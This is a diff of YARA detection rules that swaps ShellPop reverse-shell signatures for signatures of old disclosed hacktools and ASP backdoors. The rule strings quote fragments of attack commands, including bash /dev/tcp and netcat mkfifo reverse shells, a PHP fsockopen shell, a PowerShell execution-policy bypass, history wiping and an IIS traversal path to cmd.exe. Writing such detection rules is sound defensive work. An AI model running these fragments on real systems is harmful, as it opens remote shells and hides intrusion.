 	strings:
-		$s1 = "socat tcp-connect" ascii
-		$s2 = ",pty,stderr,setsid,sigint,sane" ascii
+		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
+		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
+		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
+		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
+		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
 
 	condition:
-		filesize < 1KB and 2 of them
+		3 of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Perl : FILE
+rule SIGNATURE_BASE_Sig_238_Runasex
 {
 	meta:
-		description = "Detects Shellpop Perl script"
-		author = "Tobias Michalski"
-		id = "d597d213-a70b-5412-adde-791b4d498848"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5fe349db-c0fc-5a49-97ee-3142f4e0e4c1"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4298-L4311"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2412-L2430"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8f3c5920acdc080b437c15b93e192a00a5037be0323cc04473e238033b7d53ec"
-		score = 75
+		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
+		logic_hash = "dac03251539028da02c9f26f20ca751ee577c125fb4f287c61ac2ea6afb1bb28"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "32c3e287969398a070adaad9b819ee9228174c9cb318d230331d33cda51314eb"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);" ascii
-		$ = ";STDIN->fdopen(\\$c,r);$~->fdopen(\\$c,w);s" ascii
+		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
+		$s8 = "cmd.bat" fullword ascii
+		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
+		$s11 = "%s Execute Succussifully." fullword ascii
+		$s12 = "winsta0" fullword ascii
+		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
 
 	condition:
-		filesize < 2KB and 1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Python : FILE
+rule SIGNATURE_BASE_Sig_238_Nbtdump
 {
 	meta:
-		description = "Detects malicious python shell"
-		author = "Tobias Michalski"
-		id = "62fe0ae9-422e-5021-8a67-e88ff4bd2cf3"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fe490f72-a07d-57c2-b9bb-d791fab10ec6"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4313-L4325"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2432-L2451"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4c35bb739eeabf0de558ee1b97225ed4eb3198e7e6db1817348115b848146c7"
-		score = 75
+		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
+		logic_hash = "fd17851820b5036b4cc1ebb6f927bb62c898027a17b5376e9420cbfa6a166ef2"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "aee1c9e45a1edb5e462522e266256f68313e2ff5956a55f0a84f33bc6baa980b"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "os.putenv('HISTFILE', '/dev/null');" ascii
+		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
+		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
+		$s7 = "Cerberus NBTDUMP" fullword ascii
+		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
+		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
+		$s19 = "%s's password is %s</H3>" fullword wide
+		$s20 = "%s's password is blank</H3>" fullword wide
 
 	condition:
-		filesize < 2KB and 1 of them
+		5 of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_PHP_TCP : FILE
+rule SIGNATURE_BASE_Sig_238_Glass2K
 {
 	meta:
-		description = "Detects malicious PHP shell"
-		author = "Tobias Michalski"
-		id = "3bafc225-62e5-5183-84aa-9c3406b6c444"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7a2ad37a-6b55-5710-b07d-7c289cdbb04e"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4327-L4340"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2453-L2470"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ffab71130b4fa6efbe9864f97c33fed9359f79d51b84e8f952c911f24d1496c"
-		score = 75
+		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
+		logic_hash = "d9b6b904028d67804d095f85caea5796f528f866191d3b4250055a75511f2090"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "0412e1ab9c672abecb3979a401f67d35a4a830c65f34bdee3f87e87d060f0290"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "php -r \"\\$sock=fsockopen" ascii
-		$x2 = ";exec('/bin/sh -i <&3 >&3 2>&3');\"" ascii
+		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
+		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
+		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
+		$s4 = "Glass2k.exe" fullword wide
+		$s7 = "NeoLite Executable File Compressor" fullword ascii
 
 	condition:
-		filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Powershell_TCP : FILE
+rule SIGNATURE_BASE_Splitjoin_V1_3_3_Rar_Folder_3
 {
 	meta:
-		description = "Detects malicious powershell"
-		author = "Tobias Michalski"
-		id = "4f3a92db-f686-559a-9588-fb79f423c51f"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ffd7501-339c-52b7-8661-2c3ca57dfa1f"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4342-L4355"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2472-L2487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8eb484ba87fa2e10af3c59445ccb4be73db2f5ae67c59118a2e188ba02fdc957"
-		score = 75
+		hash = "21409117b536664a913dcd159d6f4d8758f43435"
+		logic_hash = "79eb49413cd6919e4b91e916d2612e007fd2c4da7244d9e1e3dd04d46c461d8c"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "Something went wrong with execution of command on the target" ascii
-		$ = ";[byte[]]$bytes = 0..65535|%{0};$sendbytes =" ascii
+		$s2 = "ie686@sohu.com" fullword ascii
+		$s3 = "splitjoin.exe" fullword ascii
+		$s7 = "SplitJoin" fullword ascii
 
 	condition:
-		filesize < 3KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Powershell_Shellcommand_May18_1 : FILE
+rule SIGNATURE_BASE_Aspbackdoor_EDIT
 {
 	meta:
-		description = "Detects a supcicious powershell commandline"
-		author = "Tobias Michalski"
-		id = "efa81fd0-b764-5a1a-98a5-fc3135be220b"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cdcec370-97af-51c0-b81a-35a788f16ef4"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4357-L4370"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2489-L2508"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bc858d74b8aad09ff539489e961e1a51ba5fe17d3424615ffe5029587ddb9478"
-		score = 65
+		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
+		logic_hash = "0f97c831eb9f257a2a6c9a677dde2ce17d529584fb7085bc94edd83d886e469f"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "powershell -nop -ep bypass -Command" ascii
+		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
 
 	condition:
-		filesize < 3KB and 1 of them
+		5 of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Telnet_TCP : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Entice
 {
 	meta:
-		description = "Detects malicious telnet shell"
-		author = "Tobias Michalski"
-		id = "dbd5cc65-c6f1-54f3-813f-7a7f9bcca184"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file entice.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "68c61920-9c3c-5bfe-976c-346b258bb406"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4372-L4385"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2510-L2527"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e900fb8c0f1fa61f242b97ac542cb1bfd691dd50523e0023e97e3b21617053d7"
-		score = 75
+		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
+		logic_hash = "c11313351565d26d9b16a2d5c3c4589676593fe633c441a1c1a33b3c134a2d56"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "cf5232bae0364606361adafab32f19cf56764a9d3aef94890dda9f7fcd684a0e"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
-		$x2 = "0</tmp/f|/bin/bash 1>/tmp/f" fullword ascii
+		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
+		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
 
 	condition:
-		filesize < 3KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Shellpop_Bash
+rule SIGNATURE_BASE_Fpipe2_0
 {
 	meta:
-		description = "Detects susupicious bash command"
-		author = "Tobias Michalski"
-		id = "771b7d01-272a-5986-af07-7417b84c52ed"
-		date = "2018-05-18"
-		modified = "2025-04-11"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4387-L4404"
+		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7e104cf6-69d2-590e-8999-4f0d448719f2"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2529-L2547"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a557822eaaad84897acc32935f7545deb17ea3b8c6e34acd0ac5ef9fad08cb1e"
-		score = 70
+		hash = "891609db7a6787575641154e7aab7757e74d837b"
+		logic_hash = "b28566315ddda7765dfee722f5ad02c1206c6916363d86407fdc61b53148f511"
+		score = 60
 		quality = 85
 		tags = ""
-		hash1 = "36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "bash -i >& /dev/tcp/" ascii
-		$x2 = "bash -i >& /dev/tcp/" ascii base64
-		$fp1 = "bash -i >& /dev/tcp/IP/PORT" ascii
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = " -s    - outbound connection source port number" fullword ascii
+		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s4 = "http://www.foundstone.com" fullword ascii
+		$s19 = "FPipe" fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Netcat : FILE
+rule SIGNATURE_BASE_Instgina
 {
 	meta:
-		description = "Detects suspcious netcat shellpop"
-		author = "Tobias Michalski"
-		id = "cd55e912-b57b-5fce-98eb-5a0cd27a6e4d"
-		date = "2018-05-18"
+		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ccbda689-e61a-501d-a8ed-62e3c1c20289"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4406-L4421"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2549-L2564"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c61da27d4bc455a9f2555fcc1c5cce7cead226a5900eeed1aaf622616051b79"
-		score = 75
+		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
+		logic_hash = "a55a13ced122b9901f0505d585e7a7c984d4231b3507282c1b15ff400ce51265"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "98e3324f4c096bb1e5533114249a9e5c43c7913afa3070488b16d5b209e015ee"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
-		$s2 = "fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc" ascii
-		$s4 = "mknod /tmp/f p && nc" ascii
-		$s5 = "</tmp/f|/bin/bash 1>/tmp/f" ascii
+		$s0 = "To Open Registry" fullword ascii
+		$s4 = "I love Candy very much!!" ascii
+		$s5 = "GinaDLL" fullword ascii
 
 	condition:
-		filesize < 2KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Berootexe : FILE
+rule SIGNATURE_BASE_Arttray_Zip_Folder_Arttray
 {
 	meta:
-		description = "Detects beRoot.exe which checks common Windows missconfigurations"
-		author = "yarGen Rule Generator"
-		id = "b91c2e0b-2e47-5339-bf48-eaa8329ea63b"
-		date = "2018-07-25"
+		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d29909a4-8663-54c7-8f0e-68b15def869f"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4423-L4439"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2566-L2582"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8e10fddd3b3eb5e5200d9ed0bcb23961d196d9e1de03ebf03a96374ee02a9097"
-		score = 75
+		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
+		logic_hash = "225be71bfd047331399162941edf06c72d2fd1afa04c78cbc51099665f50883b"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "865b3b8ec9d03d3475286c3030958d90fc72b21b0dca38e5bf8e236602136dd7"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "checks.webclient.secretsdump(" ascii
-		$s2 = "beroot.modules" fullword ascii
-		$s3 = "beRoot.exe.manifest" fullword ascii
+		$s0 = "http://www.brigsoft.com" fullword wide
+		$s2 = "ArtTrayHookDll.dll" fullword ascii
+		$s3 = "ArtTray Version 1.0 " fullword wide
+		$s16 = "TRM_HOOKCALLBACK" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Berootexe_Output : FILE
+rule SIGNATURE_BASE_Sig_238_Findoor
 {
 	meta:
-		description = "Detects the output of beRoot.exe"
-		author = "Tobias Michalski"
-		id = "dfd11915-443f-5ce9-b94a-bdcb0e62104e"
-		date = "2018-07-25"
+		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "61215a76-8c29-505d-bfef-a5f13fec476c"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4441-L4455"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2584-L2601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7886535d071092df76507f0dd431409e85c368d404f49e7f118278f6565618e6"
-		score = 75
+		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
+		logic_hash = "223f324ab6b61775d500dc248b9db8363ce915ec279a893a6f0ec92b273a27c0"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "permissions: {'change_config'" fullword wide
-		$s2 = "Full path: C:\\Windows\\system32\\msiexec.exe /V" fullword wide
-		$s3 = "Full path: C:\\Windows\\system32\\svchost.exe -k DevicesFlow" fullword wide
-		$s4 = "! BANG BANG !" fullword wide
+		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
+		$s8 = "PASS hacker@hacker.com" fullword ascii
+		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
+		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
+		$s11 = "http://isno.yeah.net" fullword ascii
 
 	condition:
-		filesize < 400KB and 3 of them
+		4 of them
 }
-rule SIGNATURE_BASE_HKTL_Embeddedpdf : FILE
+rule SIGNATURE_BASE_Aspbackdoor_Ipclear
 {
 	meta:
-		description = "Detects Embedded PDFs which can start malicious content"
-		author = "Tobias Michalski"
-		id = "d4e2d878-fb75-54c5-9879-fe94102911d1"
-		date = "2018-07-25"
+		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "71ebecea-721f-5c5d-9997-6a57f070d91c"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://twitter.com/infosecn1nja/status/1021399595899731968?s=12"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4457-L4473"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2603-L2620"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "041580406e2a7c644d713d8fbf7fccb81664ff536e62df26b3c0f331409fb993"
-		score = 75
+		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
+		logic_hash = "49fbe844a99aa8cae25db90e1d8cdeee13c81293bba7b3201afc4748cb0a6a7c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({" fullword ascii
-		$s1 = "(This PDF document embeds file" fullword ascii
-		$s2 = "/Names << /EmbeddedFiles << /Names" fullword ascii
-		$s3 = "/Type /EmbeddedFile" fullword ascii
+		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5025 and 2 of ( $s* ) and $x1
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Blackbone_Driverinjector : FILE
+rule SIGNATURE_BASE_Wineggdropshellfinal_Zip_Folder_Injectt
 {
 	meta:
-		description = "Detects BlackBone Driver injector"
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0d992a6c-c57a-5895-af0d-9c167d922601"
-		date = "2018-09-11"
+		id = "16f04551-050f-5a07-a35b-a3a7dbba6803"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		old_rule_name = "HTKL_BlackBone_DriverInjector"
-		reference = "https://github.com/DarthTon/Blackbone"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4475-L4503"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2622-L2639"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d6a5f02a465ea46892e1de54a3482aace387ab0d2cdb949e263ce63f4f9edbb7"
+		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
+		logic_hash = "01840f4df12fbf6f5f27a3050c841002678605cd373e9ea9b182b2026caa29f9"
 		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "8062a4284c719412270614458150cb4abbdf77b2fc35f770ce9c45d10ccb1f4d"
-		hash2 = "2d2fc27200c22442ac03e2f454b6e1f90f2bbc17017f05b09f7824fac6beb14b"
-		hash3 = "e45da157483232d9c9c72f44b13fca2a0d268393044db00104cc1afe184ca8d1"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "=INITtH=PAGEtA" fullword ascii
-		$s2 = "BBInjectDll" fullword ascii
-		$s3 = "LdrLoadDll" fullword ascii
-		$s4 = "\\??\\pipe\\%ls" fullword wide
-		$s5 = "Failed to retrieve Kernel base address. Aborting" fullword ascii
-		$x2 = "BlackBone: %s: APC injection failed with status 0x%X" fullword ascii
-		$x3 = "BlackBone: PDE_BASE/PTE_BASE not found " fullword ascii
-		$x4 = "%s: Invalid injection type specified - %d" fullword ascii
-		$x6 = "Trying to map C:\\windows\\system32\\cmd.exe into current process" fullword wide
-		$x7 = "\\BlackBoneDrv\\bin\\" ascii
-		$x8 = "DosDevices\\BlackBone" wide
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "2TInject.Dll" fullword ascii
+		$s2 = "Windows Services" fullword ascii
+		$s3 = "Findrst6" fullword ascii
+		$s4 = "Press Any Key To Continue......" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and ( 3 of them or 1 of ( $x* ) )
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Sqlmap : FILE
+rule SIGNATURE_BASE_Gina_Zip_Folder_Gina
 {
 	meta:
-		description = "Detects sqlmap hacktool"
+		description = "Disclosed hacktool set (old stuff) - file gina.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da2029dd-c4ce-557f-a409-c468fa3deef3"
-		date = "2018-10-09"
+		id = "7ebc7218-9c7b-5595-ae7b-f316fc99d1f6"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://github.com/sqlmapproject/sqlmap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4505-L4518"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L2641-L2661"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9aa13bc2db40f5ab3debd617c84b1e11805d137bc55e9088bc9a0c23e185dfce"
-		score = 75
+		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
+		logic_hash = "1344634346f9e7e3ef96c901705ac7bd4aa9a70cfbebf71c8222544e84ca9f98"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		hash1 = "9444478b03caf7af853a64696dd70083bfe67f76aa08a16a151c00aadb540fa8"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "if cmdLineOptions.get(\"sqlmapShell\"):" fullword ascii
-		$x2 = "if conf.get(\"dumper\"):" fullword ascii
+		$s0 = "NEWGINA.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s3 = "WlxActivateUserShell" fullword ascii
+		$s6 = "WlxWkstaLockedSAS" fullword ascii
+		$s13 = "WlxIsLockOk" fullword ascii
+		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s16 = "WlxShutdown" fullword ascii
+		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		filesize < 50KB and 1 of them
+		all of them
 }
